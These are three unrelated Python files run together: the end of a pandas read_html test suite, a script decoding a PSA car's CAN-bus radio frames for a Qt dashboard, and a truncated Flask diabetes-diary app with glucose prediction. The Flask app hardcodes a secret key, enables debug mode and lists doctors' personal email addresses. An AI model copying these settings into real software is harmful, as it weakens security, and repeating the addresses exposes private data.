<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
def __iter__(self):
# to fool `is_file_like`, should never end up here
assert False
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
        # force import check by reinitialising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
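# Illustrative standalone example (not part of the test suite): read_html
# parses every <table> in the given markup into a DataFrame, so a single
# table yields a one-element list.
def _read_html_inline_example():
    html = "<table><tr><th>A</th><th>B</th></tr><tr><td>1</td><td>2</td></tr></table>"
    (df,) = read_html(html)
    return df  # columns "A" and "B", one data row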
|
StarlightUI.py
|
import sys
import can
import can.interfaces.slcan
import threading
import os
from os.path import abspath, dirname, join
from datetime import datetime, date
import time
from textwrap import wrap
from PyQt5 import QtCore, QtGui, QtQml
from PyQt5.QtWidgets import QApplication
from PyQt5.QtQml import QQmlApplicationEngine
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import QTimer
from PyQt5.QtQuick import QQuickView
from vars import *
def radioFunctions():
global rdsText, isSeeking, source, freq, stationMem, modType, radioBand, volume, radioPower, showAudioMenu, srcImage
if not radioPower:
rdsText = "Radio Off"
freq = ""
radioBand = ""
modType = ""
stationMem = ""
srcImage = "power_off.png"
else:
if source == "AUX":
rdsText = "Playing from AUX"
freq = ""
radioBand = ""
modType = ""
stationMem = ""
srcImage = "aux_cable.png"
elif source == "CD":
if discType == "Audio CD":
rdsText = "Track " + str(cdCurrentTrack) +" / " + str(trackAll)
freq = currentTrackTime
radioBand = discType
modType = ""
stationMem = ""
else:
rdsText = cdTrackDetails[1][:25]
freq = cdTrackDetails[0]
radioBand = discType
modType = ""
stationMem = currentTrackTime
elif source == "Radio":
srcImage = "radio.png"
elif source == "USB":
rdsText = usbTrackName[1][:25]
freq = usbTrackName[0]
radioBand = current_time_USB
modType = ""
srcImage = "usb.png"
stationMem = ""
if isLRBal or isRFBal or isBass or isTreble or isLoudness or isAutoVol or isEQPreset:
showAudioMenu = True
else:
showAudioMenu = False
def tripFunction():
global tripImage
if tripMode == 0:
tripImage = ["trip_gasstation.png", "trip_fuel.png", "trip_distance.png"]
if tripMode == 1:
tripImage = ["trip_fuel.png", "trip_gasstation.png","trip_distance.png"]
def canSend():
global menuItem
    #Main menu task (needs cleanup later)
msgList = can.Message(arbitration_id=0x09F, data=[0x30, 0x00, 0x0A], is_extended_id=False)
print (menuItem)
if menuItem == "List":
bus.send(msgList)
menuItem = "None"
#Send Audio Settings only if menu visible to cut overall delay
def sendAudioValues():
#Show Setting
engine.rootObjects()[0].setProperty('isBass', isBass)
engine.rootObjects()[0].setProperty('isTreble', isTreble)
engine.rootObjects()[0].setProperty('isLoudness', isLoudness)
engine.rootObjects()[0].setProperty('isAutoVol', isAutoVol)
engine.rootObjects()[0].setProperty('isRFBal', isRFBal)
engine.rootObjects()[0].setProperty('isLRBal', isLRBal)
engine.rootObjects()[0].setProperty('isEQPreset', isEQPreset)
#Send Value
engine.rootObjects()[0].setProperty('bassValue', bassValue)
engine.rootObjects()[0].setProperty('trebleValue', trebleValue)
engine.rootObjects()[0].setProperty('loudValue', loudValue)
engine.rootObjects()[0].setProperty('autoVolValue', autoVolValue)
engine.rootObjects()[0].setProperty('rfValue', rfValue)
engine.rootObjects()[0].setProperty('lrValue', lrValue)
engine.rootObjects()[0].setProperty('eqPresetValue', eqPresetValue)
def sendList():
engine.rootObjects()[0].setProperty('trackList', trackList)
engine.rootObjects()[0].setProperty('trackListSel', trackListSel)
def canRead():
#bus = can.Bus(interface='slcan', channel='COM10', receive_own_messages=True)
global bus
bus = can.ThreadSafeBus(interface='slcan', channel='COM4')
#Define stuff
global rdsText, isSeeking, source, freq, stationMem, modType, radioBand, volume, isVolumeChanging, isVolumeStillChanging, radioPower, isLRBal, isRFBal, isBass, isTreble, isLoudness, isAutoVol, isEQPreset
global lrValue, rfValue, bassValue, trebleValue, loudValue, autoVolValue, eqPresetValue
global trackAll, discType, srcImage, cdCurrentTrack, currentTrackTime, menuItem, showMainMenu, current_time_USB, theID, usbTrackName, cdTrackDetails, trackList, showList, trackListSel
global tripInfo, darkMode, tripMode
curr_timer = time.time()
frameNum = 0
usbName = ""
frameLen = 0
cdframeNum = 0
cdframeLen = 0
cdName = ""
bigList = ""
bigListSplit = ""
initialList = True
tripMode = 0
for msg in bus:
id = msg.arbitration_id
if id == 0x123:
message = msg.data
messageAsc = message.hex(" ")
print (messageAsc)
#This one gets the RDS text (if available) and displays it. PSA did us a solid and is sending it in ASCII. Thanks French Gods
if id == 677 and radioPower:
rdsbytearr = msg.data
if rdsbytearr == b'\x00\x00\x00\x00\x00\x00\x00\x00':
rdsText = "No RDS Available"
else:
rdsText = rdsbytearr.decode()
#This one is for the radio's Band Display (FM1,etc) and displaying if we are using MHz or KHz
elif id == 549 and radioPower:
radioStatusarr = msg.data
radioStatus = radioStatusarr.hex('#')
radioHex = radioStatusarr.hex()
scale = 16
bitNum = 8
radioSplit = radioStatus.split("#")
radioStr = [bin(int(n, 16))[2:].zfill(bitNum) for n in radioSplit]
if str(radioSplit[2]) == "10":
radioBand = "FM-1"
modType = "MHz"
elif str(radioSplit[2]) == "20":
radioBand = "FM-2"
modType = "MHz"
elif str(radioSplit[2]) == "40":
radioBand = "FM-AST"
modType = "MHz"
elif str(radioSplit[2]) == "50":
radioBand = "AM"
modType = "KHz"
freqHex = radioSplit[3] + radioSplit[4]
freq = int(freqHex, 16)
freq = (freq * 0.05) + 50
freq = "%.2f" % freq
memHex = radioSplit[1]
stationMemarr = list(str(memHex))
stationMem = stationMemarr[0]
#This one reads the Source frame and displays accordingly. Added BT and USB just so you don't have to
elif id == 357:
sourcearr = msg.data
sourceHex = sourcearr.hex('#')
sourceSplit = sourceHex.split("#")
if sourceSplit[2] == "10":
source = "Radio"
elif sourceSplit[2] == "20":
source = "CD"
elif sourceSplit[2] == "40":
source = "AUX"
elif sourceSplit[2] == "60":
source = "USB"
elif sourceSplit[2] == "70":
source = "Bluetooth"
if sourceSplit[0] == "40":
#Set if Power is off. Everything else is on
radioPower = False
elif sourceSplit[0] == "E0":
radioPower = True
#Add mute state
else:
radioPower = True
#Gets the volume frame, turns HEX to Binary, splits the first 3 bits that tell us if the volume is currently being changed and translates the rest to integer
elif id == 421:
volarr = msg.data
volHex = volarr.hex()
scale = 16
bitNum = 8
volStr = bin(int(volHex, scale))[2:].zfill(bitNum)
volume = int(volStr[3:], 2)
if volStr[:3] == "000":
isVolumeChanging = True
isVolumeStillChanging = True
curr_timer = time.time()
msgFCF = can.Message(arbitration_id=0x525, data=[0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00], is_extended_id=False)
bus.send(msgFCF)
msgFCF = can.Message(arbitration_id=0x52E, data=[0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00], is_extended_id=False)
bus.send(msgFCF)
msgFCF = can.Message(arbitration_id=0x52F, data=[0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00], is_extended_id=False)
bus.send(msgFCF)
else:
isVolumeStillChanging = False
if (time.time() - curr_timer) >= 2:
isVolumeChanging = False
        #This block handles the audio settings menu
elif id == 485:
scale = 16
bitNum = 8
soundSetarr = msg.data
soundSetHex = soundSetarr.hex("#")
splits = soundSetHex.split("#")
soundSetBin = [bin(int(n, 16))[2:].zfill(bitNum) for n in splits]
#Left-Right Balance
if soundSetBin[0][0] == "1":
isLRBal = True
else:
isLRBal = False
if soundSetBin[1][0] == "1":
isRFBal = True
else:
isRFBal = False
if soundSetBin[2][0] == "1":
isBass = True
else:
isBass = False
if soundSetBin[4][0] == "1":
isTreble = True
else:
isTreble = False
if soundSetBin[5][0] == "1":
isLoudness = True
else:
isLoudness = False
if soundSetBin[5][3] == "1":
isAutoVol = True
else:
isAutoVol = False
if soundSetBin[6][1] == "1":
isEQPreset = True
else:
isEQPreset = False
#Handle the values and send them over, regardless of menu visibility
lrValue = int(soundSetBin[0][1:], 2) - 63
rfValue = int(soundSetBin[1][1:], 2) - 63
bassValue = int(soundSetBin[2][1:], 2) - 63
trebleValue = int(soundSetBin[4][1:], 2) - 63
loudValue = int(soundSetBin[5][1])
autoVolValue = int(soundSetBin[5][5:])
#Set EQ text
eqBin = int(soundSetBin[6][3:], 2)
if eqBin == 3:
eqPresetValue = "None"
elif eqBin == 7:
eqPresetValue = "Classical"
elif eqBin == 11:
eqPresetValue = "Jazz-Blues"
elif eqBin == 15:
eqPresetValue = "Pop-Rock"
elif eqBin == 19:
eqPresetValue = "Vocal"
elif eqBin == 23:
eqPresetValue = "Techno"
elif id == 869:
cdPresenceInfo = (msg.data).hex("#")
cdPresenceSplit = cdPresenceInfo.split("#")
trackAll = int(cdPresenceSplit[0], 16)
if trackAll == 255:
cdCurrentTrack = "--"
if str(cdPresenceSplit[3]) == "01":
discType = "MP3 Disc"
srcImage = "cd_mp3.png"
else:
discType = "Audio CD"
srcImage = "cd_audio.png"
elif id == 933 and source == "CD":
cdTrackHex = (msg.data).hex("#")
cdTrackSplit = cdTrackHex.split("#")
cdCurrentTrack = int(cdTrackSplit[0], 16)
if cdCurrentTrack == 255:
cdCurrentTrack = "--"
currentTrackTime = str("{:02}".format(int(cdTrackSplit[3], 16))) + ":" + str("{:02}".format(int(cdTrackSplit[4], 16)))
if currentTrackTime == "255:127":
currentTrackTime = "--:--"
elif id == 0x3E5:
            #Main menu handling (needs cleanup)
message = (msg.data).hex("#")
messageSplit = message.split("#")
scale = 16
bitNum = 8
messageStr = [bin(int(n, 16))[2:].zfill(bitNum) for n in messageSplit]
#if messageStr[0][1] == "1":
#menuItem = "Menu"
#msgMenu = can.Message(arbitration_id=0xDF, data=[0x90, 0x00, 0x70], is_extended_id=False)
#task = bus.send_periodic(msgMenu, 0.1)
#task.start()
#showMainMenu = True
#elif messageStr[2][3] == "1" and menuItem == "Menu":
#menuItem = "None"
#task.stop()
#showMainMenu = False
if messageStr[1][3] == "1":
#Mode button will change trip for now
tripMode += 1
if tripMode == 3:
tripMode = 0
elif messageStr[2][5] == "1":
if darkMode:
darkMode = False
else:
darkMode = True
print (darkMode)
elif id == 0x0A4:
# This one gets the track name from the CD. Works with MP3s, no idea if it works with Audio CDs (tests show that normal CDs don't have track data)
message = msg.data
messageHex = (msg.data).hex("#")
messageSplit = messageHex.split("#")
if messageSplit[0] == "10":
cdframeNum = 0
cdName = ""
cdframeLen = int(messageSplit[1], 16)
nameClean = message[6:]
singleFrame = nameClean.decode('ISO-8859-1')
else:
nameClean = message[1:]
singleFrame = nameClean.decode('ISO-8859-1')
cdframeNum = cdframeNum + 1
cdName = cdName + singleFrame
# Flow Control Frame
msgFCF = can.Message(arbitration_id=0x09F, data=[0x30, 0x00, 0x0A], is_extended_id=False)
bus.send(msgFCF)
if cdframeNum == 7:
#When the length of the variable is the same as what the radio declared at the start,
#push it into the Global and split is at the NULL character so we have artist and track name separate
cdTrackNameStr = cdName[20:]
cdTrackName = cdTrackNameStr.split("\x00")[0]
cdTrackArtStr = cdName[:20]
cdTrackArtist = cdTrackArtStr.split("\x00")[0]
cdTrackDetails = [cdTrackArtist, cdTrackName]
                #Sleep briefly before handling the next frame; it makes the result more reliable
time.sleep(0.1)
elif id == 0x363:
message = (msg.data).hex("#")
messageSplit = message.split("#")
secondsForm = int(messageSplit[6], 16) / 4
current_time_USB = str("{:02}".format(int(messageSplit[7], 16))) + ":" + str("{:02}".format(int(secondsForm)))
elif id == 0x2E3:
            # This is the USB text frame. It contains the track and artist data. It is not documented, so it was hard to find and even harder to find the FCF for it.
            # It is a CAN-TP frame: the first frame starts with 10 (multiframe marker), followed by the length of the name and then 0x63 (purpose unknown).
            # The code below hexifies the frame and splits it to get the text length, then shaves the first 3 bytes off
            # the initial frame and passes the rest to the "completed" name variable. Frames after the initial one only carry one byte we don't need (the index),
            # so that byte is stripped off and the remainder is appended to the final text string as well. There is no protection yet against frames arriving out of order.
message = msg.data
messageHex = (msg.data).hex("#")
messageSplit = messageHex.split("#")
            # The radio sends a frame with data [10, 60] to signal that it will start sending a new title. We detect that and reinitialize all of our variables.
if messageSplit[0] == "01" and messageSplit[1] == "60":
frameNum = 0
usbName = ""
frameNum = frameNum + 1
if frameNum == 2:
frameLen = int(messageSplit[1], 16)
nameClean = message[3:]
singleFrame = nameClean.decode('ISO-8859-1')
else:
nameClean = message[1:]
singleFrame = nameClean.decode('ISO-8859-1')
if not frameNum == 1:
usbName = usbName + singleFrame
#Send the Flow Control Frame over to the radio so it gives us the rest of the frames
msgFCF = can.Message(arbitration_id=351, data=[0x30, 0x00, 0x0A], is_extended_id=False)
bus.send(msgFCF)
if frameLen == (len(usbName) + 1):
#When the length of the variable is the same as what the radio declared at the start,
#push it into the Global and split is at the NULL character so we have artist and track name separate
usbTrackName = usbName.split("\x00")
time.sleep(0.1)
elif id == 0x125 and discType == "MP3 Disc":
# List Thing. Each title is 20 chars long. When 1st byte is 06, get the selected track
message = msg.data
messageHex = (msg.data).hex("#")
messageSplit = messageHex.split("#")
if messageSplit[0] == "05" and messageSplit[1] == "00":
showList = False
initialList = True
trackList = []
else:
showList = True
#If we have just opened it, initialize everything
if initialList:
trackList = []
trackListSel = [False, False, False, False]
trackListSel[1] = True
#this closes and opens the list
if messageSplit[0] == "05":
bigList = ""
#Waits for all the names to be loaded
if messageSplit[0] >= "21" and initialList:
trackList = [" ", "Loading...", " ", " "]
nameClean = message[1:]
singleFrame = nameClean.decode('ISO-8859-1')
bigList += singleFrame
#This signals the final frame
if messageSplit[0] == "2c" and initialList:
trackList = []
bigListSplit = [bigList[i:i+20] for i in range(0, len(bigList), 20)]
initialList = False
#Split the track names so nulls get ded and create the track list
for x in bigListSplit:
temp = x.rsplit('\x00')
trackList.append(temp[0])
bigList = ""
else:
                    #Handles what happens after the list is loaded and we try to scroll up or down
                    #Done in an unorthodox way, but it works
if messageSplit[0] == "06" and messageSplit[1] == "98" and not initialList:
selection = int(messageSplit[4], 16)
trackListSel = [False, False, False, False]
trackListSel[selection] = True
if messageSplit[0] == "21":
if selection == 0:
trackList.pop(3)
else:
trackList.pop(0)
trackList.insert(selection, "Loading...")
bigList = ""
if messageSplit[0] >= "21" and not initialList:
nameClean = message[1:]
singleFrame = nameClean.decode('ISO-8859-1')
bigList += singleFrame
if messageSplit[0] == "23" and not initialList:
trackList.pop(selection)
temp = bigList.rsplit('\x00')
trackList.insert(selection, temp[0])
if messageSplit[0] == "06" and messageSplit[1] == "90":
trackListSel = [False, False, False, False]
trackListSel[1] = True
trackList = [" ", discType, " ", " "]
initialList = True
msgFCF = can.Message(arbitration_id=0x11F, data=[0x30, 0x00, 0x0A], is_extended_id=False)
bus.send(msgFCF)
time.sleep(0.15)
elif id == 0x221 and tripMode == 0:
            #Trip computer frame (fuel consumption / range data)
message = (msg.data).hex("#")
messageSplit = message.split("#")
            litersPerHundoHex = messageSplit[1] + messageSplit[2]
            kmUntilDeadHex = messageSplit[3] + messageSplit[4]
            kmRestHex = messageSplit[5] + messageSplit[6]
litersPerHundo = int(litersPerHundoHex, 16)
kmUntilDead = int(kmUntilDeadHex, 16)
kmRest = int(kmRestHex, 16)
#print ("Liters: " + str(litersPerHundo) + " Km Dead: " + str(kmUntilDead) + " Km Rest: " + str(kmRest))
tripInfo = [str(kmUntilDead), str(litersPerHundo/10), str(kmRest)]
elif id == 0x2A1 and tripMode == 1:
message = (msg.data).hex("#")
messageSplit = message.split("#")
            litersPerHundoHex = messageSplit[3] + messageSplit[4]
            avSpeedHex = messageSplit[0]
            milesTripHex = messageSplit[1] + messageSplit[2]
litersPerHundo = int(litersPerHundoHex, 16)
avSpeed = int(avSpeedHex, 16)
milesTrip = int(milesTripHex, 16)
tripInfo = [str(avSpeed), str(litersPerHundo/10), str(avSpeed)]
elif id == 0x261 and tripMode == 2:
message = (msg.data).hex("#")
messageSplit = message.split("#")
            litersPerHundoHex = messageSplit[3] + messageSplit[4]
            avSpeedHex = messageSplit[0]
            milesTripHex = messageSplit[1] + messageSplit[2]
litersPerHundo = int(litersPerHundoHex, 16)
avSpeed = int(avSpeedHex, 16)
milesTrip = int(milesTripHex, 16)
tripInfo = [str(avSpeed), str(litersPerHundo/10), str(milesTrip)]
application_path = (
sys._MEIPASS
if getattr(sys, "frozen", False)
else os.path.dirname(os.path.abspath(__file__))
)
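# application_path resolves to sys._MEIPASS when running as a PyInstaller bundle
# (sys.frozen is set) and to the script's own directory otherwise; dashUI.qml is
# loaded relative to it below.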
def main():
global engine
app = QApplication(sys.argv)
engine = QQmlApplicationEngine()
# Get the path of the current directory, and then add the name
# of the QML file, to load it.
qmlFile = os.path.join(application_path, "dashUI.qml")
engine.load(QtCore.QUrl.fromLocalFile(qmlFile))
#Needs optimization: pushes all display data to the QML file. Runs every 50 ms so station seeking and volume changes look smooth
#Start Reading Thread
#th = threading.Thread(target=canRead)
#th.start()
def update_display():
radioFunctions()
tripFunction()
engine.rootObjects()[0].setProperty('radioBand', radioBand)
engine.rootObjects()[0].setProperty('rdsText', rdsText)
engine.rootObjects()[0].setProperty('freq', freq)
engine.rootObjects()[0].setProperty('stationMem', stationMem)
engine.rootObjects()[0].setProperty('modType', modType)
engine.rootObjects()[0].setProperty('source', source)
engine.rootObjects()[0].setProperty('srcImage', srcImage)
engine.rootObjects()[0].setProperty('showMainMenu', showMainMenu)
engine.rootObjects()[0].setProperty('isListVisible', showList)
engine.rootObjects()[0].setProperty('tripInfo', tripInfo)
engine.rootObjects()[0].setProperty('darkMode', darkMode)
engine.rootObjects()[0].setProperty('tripImage', tripImage)
engine.rootObjects()[0].setProperty('isVolumeChanging', isVolumeChanging)
engine.rootObjects()[0].setProperty('showAudioMenu', showAudioMenu)
if isVolumeChanging:
engine.rootObjects()[0].setProperty('volume', volume)
if showAudioMenu:
sendAudioValues()
if showList:
sendList()
#Gets and updates the date and time every second from the Pi's local clock instead of querying the BSI
def update_datetime():
today = date.today()
now = datetime.now()
current_time = now.strftime("%H:%M")
curr_date = today.strftime("%d/%m/%Y")
engine.rootObjects()[0].setProperty('time', current_time)
engine.rootObjects()[0].setProperty('date', curr_date)
#Timer for updating everything
timer = QTimer()
timer.setInterval(50) # msecs 1000 = 1 sec
timer.timeout.connect(update_display)
timer.start()
#Timer for updating date and time
timer2 = QTimer()
timer2.setInterval(1000)
timer2.timeout.connect(update_datetime)
timer2.start()
if not engine.rootObjects():
sys.exit(-1)
sys.exit(app.exec_())
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('Interrupted')
try:
sys.exit(0)
except SystemExit:
os._exit(0)
|
__init__.py
|
import logging
import datetime
import codecs
import os
import sqlite3
import numpy as np
from sqlite3 import OperationalError
from copy import copy
from threading import Thread
import openpyxl
import pandas as pd
import xgboost as xgb
from flask import Flask, render_template, request, redirect, url_for, session
from flask import send_file, jsonify, after_this_request, make_response
from flask_bootstrap import Bootstrap
from flask_login import LoginManager, UserMixin, login_user, login_required
from flask_login import logout_user, current_user
from flask_mail import Mail, Message
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from openpyxl.styles import Font, PatternFill
from openpyxl.styles.borders import Border, Side
from werkzeug.security import generate_password_hash, check_password_hash
from wtforms import StringField, PasswordField, BooleanField, IntegerField, SelectField
from wtforms.validators import InputRequired, Length, Email, EqualTo
from wtforms.validators import ValidationError, NumberRange, DataRequired
app = Flask(__name__)
app.jinja_env.filters['zip'] = zip
app.secret_key = b'_5#y2L"F4Q8z\n\xec]/'
app.config['SQLALCHEMY_DATABASE_URI'] = \
'sqlite:///diacompanion.db'
app.config['TESTING'] = False
app.config['DEBUG'] = True
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
app.config['MAIL_USERNAME'] = ''
app.config['MAIL_PASSWORD'] = ''
app.config['MAIL_DEFAULT_SENDER'] = ('Еженедельник', '')
app.config['MAIL_MAX_EMAILS'] = None
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['MAIL_ASCII_ATTACHMENTS'] = False
app.config['SESSION_COOKIE_SAMESITE'] = "Lax"
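# NOTE: MAIL_USERNAME / MAIL_PASSWORD are left blank above. A minimal sketch,
# assuming the credentials are supplied via environment variables, would be:
#   app.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME', '')
#   app.config['MAIL_PASSWORD'] = os.environ.get('MAIL_PASSWORD', '')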
Bootstrap(app)
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'
mail = Mail(app)
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
username1 = db.Column(db.String(80))
email = db.Column(db.String(80), unique=True)
password = db.Column(db.String(15))
BMI = db.Column(db.String(80))
doc = db.Column(db.String(80))
class LoginForm(FlaskForm):
username = StringField('Логин или email',
validators=[InputRequired(message='Необходимо \
заполнить это поле'),
Length(min=5,
max=80,
message='Необходимо минимум 5 \
символов')])
password = PasswordField('Пароль', validators=[InputRequired(message='\
Необходимо \
заполнить \
это \
поле'),
Length(min=5,
max=15,
message='Пароль \
должен \
быть от 5 \
до 15 \
символов')])
remember = BooleanField('Запомнить меня')
class RegisterForm(FlaskForm):
email = StringField('Email',
validators=[InputRequired(message='Необходимо \
заполнить \
это поле'),
Email(message='Неправильно введен \
email'),
Length(max=80)])
username = StringField('Логин',
validators=[InputRequired(message='Необходимо \
заполнить \
это поле'),
Length(min=5,
max=15,
message='Никнейм \
должен \
быть от 5 \
до 15 \
символов')])
username1 = StringField('ФИО пользователя',
validators=[InputRequired(message='Необходимо \
заполнить \
это поле'),
Length(min=5,
max=80,
message='Необходимо минимум 5 \
символов')])
password = PasswordField('Пароль',
validators=[InputRequired(message='Создайте \
ваш \
пароль'),
Length(min=5, max=15,
message='Пароль \
должен \
быть от \
5 до 15 \
символов')])
password1 = PasswordField('Подтвердите пароль',
validators=[InputRequired(message='Необходимо \
заполнить \
это поле'),
EqualTo(fieldname='password',
message='Пароли \
не совпадают')])
weight = IntegerField('Вес, в кг',
validators=[InputRequired(message='Необходимо \
заполнить это \
поле'),
NumberRange(min=0,
max=200,
message='Укажите свой \
реальный вес'),
DataRequired(message='Введите целое \
число')])
height = IntegerField('Рост, в см',
validators=[InputRequired(message='Необходимо \
заполнить это \
поле'),
NumberRange(min=0,
max=250,
message='Укажите свой \
реальный рост'),
DataRequired(message='Введите целое \
число')])
select = SelectField(u'Лечащий врач', choices=[('pvpopova@ya.ru',
'Попова П.В.'),
('aleksandra.tkachuk.1988@mail.comm',
'Ткачук А.С.'),
('yanabolotko@gmail.com',
'Болотько Я.А.'),
('aleksandra-dronova@yandex.ru',
'Дронова А.В.'),
('elenavasukova2@gmail.com',
'Васюкова Е.А.'),
('anopova.ann@gmail.com',
'Анопова А.Д.'),
('andreigerasimov2704@gmail.com',
'Герасимов А.С.'),
('tatarinova.maria@mail.ru',
'Татаринова М.В.'),
('anna.datsiuk@mail.ru',
'Дацюк А.М.')])
def validate_username(self, username):
user = User.query.filter_by(username=username.data).first()
if user is not None:
raise ValidationError('Имя пользователя занято')
def validate_email(self, email):
email = User.query.filter_by(email=email.data).first()
if email is not None:
raise ValidationError('Email уже использовался')
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@app.route('/')
def zero():
# Redirect to the login/registration page
return redirect(url_for('login'))
@app.route('/login', methods=['GET', 'POST'])
def login():
# User login
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user is None:
user = User.query.filter_by(email=form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
return redirect(url_for('lk'))
form.username.errors.append('')
form.password.errors.append('Неверно введено имя пользователя \
или пароль')
form.password.data = ''
return render_template('LO.html', form=form)
@app.route('/signup', methods=['GET', 'POST'])
def signup():
# User registration
form = RegisterForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data,
method='sha256')
BMI = form.weight.data/((form.height.data/100)*(form.height.data/100))
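# BMI = weight [kg] / height [m]^2; height is entered in centimetres, hence /100.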
BMIdata = str(BMI)
new_user = User(username=form.username.data,
username1=form.username1.data, email=form.email.data,
password=hashed_password, BMI=BMIdata, doc=form.select.data)
db.session.add(new_user)
db.session.commit()
db.session.close()
return redirect(url_for('login'))
return render_template('SU.html', form=form)
@app.route('/logout')
@login_required
def logout():
# Log the user out
logout_user()
return redirect(url_for('login'))
@app.route('/news')
@login_required
def news():
# Home page
path = os.path.dirname(os.path.abspath(__file__))
db_2 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_2)
cur = con.cursor()
cur.execute("""SELECT food,libra FROM basket WHERE user_id = ?""",
(session['user_id'],))
result = cur.fetchall()
len2 = len(result)+1
con.close()
return render_template("searching.html", result=result, len = len2)
@app.route('/onlinepredict', methods=['GET', 'POST'])
@login_required
def pred():
if request.method == 'POST':
jsoninfo = request.get_json()
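# Example request body this route appears to expect, with field names taken from
# the accesses below and purely illustrative values:
# { "foodname": ["<food name>//<extra info>"], "Date": "2021-05-14",
#   "Time": "08:30", "Type": "Завтрак", "BG0": "5.1" }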
path = os.path.dirname(os.path.abspath(__file__))
db_21 = os.path.join(path, 'diacompanion.db')
model = os.path.join(path, 'model.model')
con = sqlite3.connect(db_21)
cur = con.cursor()
cur.execute('''SELECT BMI FROM user WHERE id = ?''',(session['user_id'],))
BMI0 = cur.fetchall()
BMI0 = BMI0[0][0]
nutr = list()
for i in range(len(jsoninfo['foodname'])):
cur.execute("""SELECT gi,carbo,prot,kr
FROM food WHERE name = ?""",
(jsoninfo['foodname'][i].split('//')[0],))
nutrients = cur.fetchall()
nutr.append(nutrients[0])
cur.execute("""SELECT date,time,type,BG0,gi,carbo,prot,kr FROM favourites
WHERE user_id = ?""", (session["user_id"],))
tb1 = cur.fetchall()
con.close()
tb1 = pd.DataFrame(tb1, columns=['date', 'time', 'types_food_n', 'BG0',
'GI', 'carbo', 'prot', 'kr'])
tb1['GI'] = pd.to_numeric(tb1['GI'], downcast='float')
tb1['carbo'] = pd.to_numeric(tb1['carbo'], downcast='float')
tb1['prot'] = pd.to_numeric(tb1['prot'], downcast='float')
tb1['kr'] = pd.to_numeric(tb1['kr'], downcast='float')
tb1['BG0'] = pd.to_numeric(tb1['BG0'], downcast='float')
tb = pd.DataFrame(nutr, columns=['GI','carbo','prot','kr'])
datenumb = jsoninfo['Date'].split('-')
ddmmyy = '.'.join([datenumb[2],datenumb[1],datenumb[0]])
date = pd.Series([ddmmyy]*len(tb['GI']))
tb['date'] = date
time = pd.Series([jsoninfo['Time']]*len(tb['GI']))
tb['time'] = time
typ_e = pd.Series([jsoninfo['Type']]*len(tb['GI']))
tb['types_food_n'] = typ_e
BG0 = pd.Series([jsoninfo['BG0']]*len(tb['GI']))
tb['BG0'] = BG0
tb = tb[['date','time','types_food_n','BG0','GI','carbo','prot','kr']]
tb['GI'] = pd.to_numeric(tb['GI'], downcast='float')
tb['carbo'] = pd.to_numeric(tb['carbo'], downcast='float')
tb['prot'] = pd.to_numeric(tb['prot'], downcast='float')
tb['kr'] = pd.to_numeric(tb['kr'], downcast='float')
tb['BG0'] = pd.to_numeric(tb['BG0'], downcast='float')
tb = pd.merge(left=tb, right=tb1, on=['date','time','types_food_n','BG0','GI','carbo','prot','kr'], how='outer')
tb = tb.groupby(['date', 'time', 'types_food_n', 'BG0'],
as_index=False).sum()
tb['GL'] = tb['GI']*tb['carbo']/100
tb['DateTime'] = tb['date'] + ' ' + tb['time']
tb['DateTime'] = pd.to_datetime(tb['DateTime'], format='%d.%m.%Y %H:%M')
tb = tb.drop(['date', 'time', 'GI'], axis=1)
prot = list()
for i in range(len(tb['DateTime'])):
start_date = tb['DateTime'][i]
mask = (tb['DateTime']
<= start_date) & (tb['DateTime']
>= (start_date
- pd.Timedelta(value=6, unit='h')))
prot_b6h = tb.loc[mask]['prot'].aggregate(np.sum)
prot.append(prot_b6h)
tb.insert(7, 'prot_b6h', prot, True)
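# prot_b6h = total protein consumed in the 6-hour window ending at each meal,
# computed from the time mask above.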
tb = tb.drop(['prot'], axis=1)
BMI = list()
for i in range(len(tb['DateTime'])):
BMI.append(BMI0)
if tb['types_food_n'][i] == 'Завтрак':
tb['types_food_n'][i] = 1
elif tb['types_food_n'][i] == 'Обед':
tb['types_food_n'][i] = 2
elif tb['types_food_n'][i] == 'Ужин':
tb['types_food_n'][i] = 3
else:
tb['types_food_n'][i] = 4
tb.insert(7, 'BMI', BMI, True)
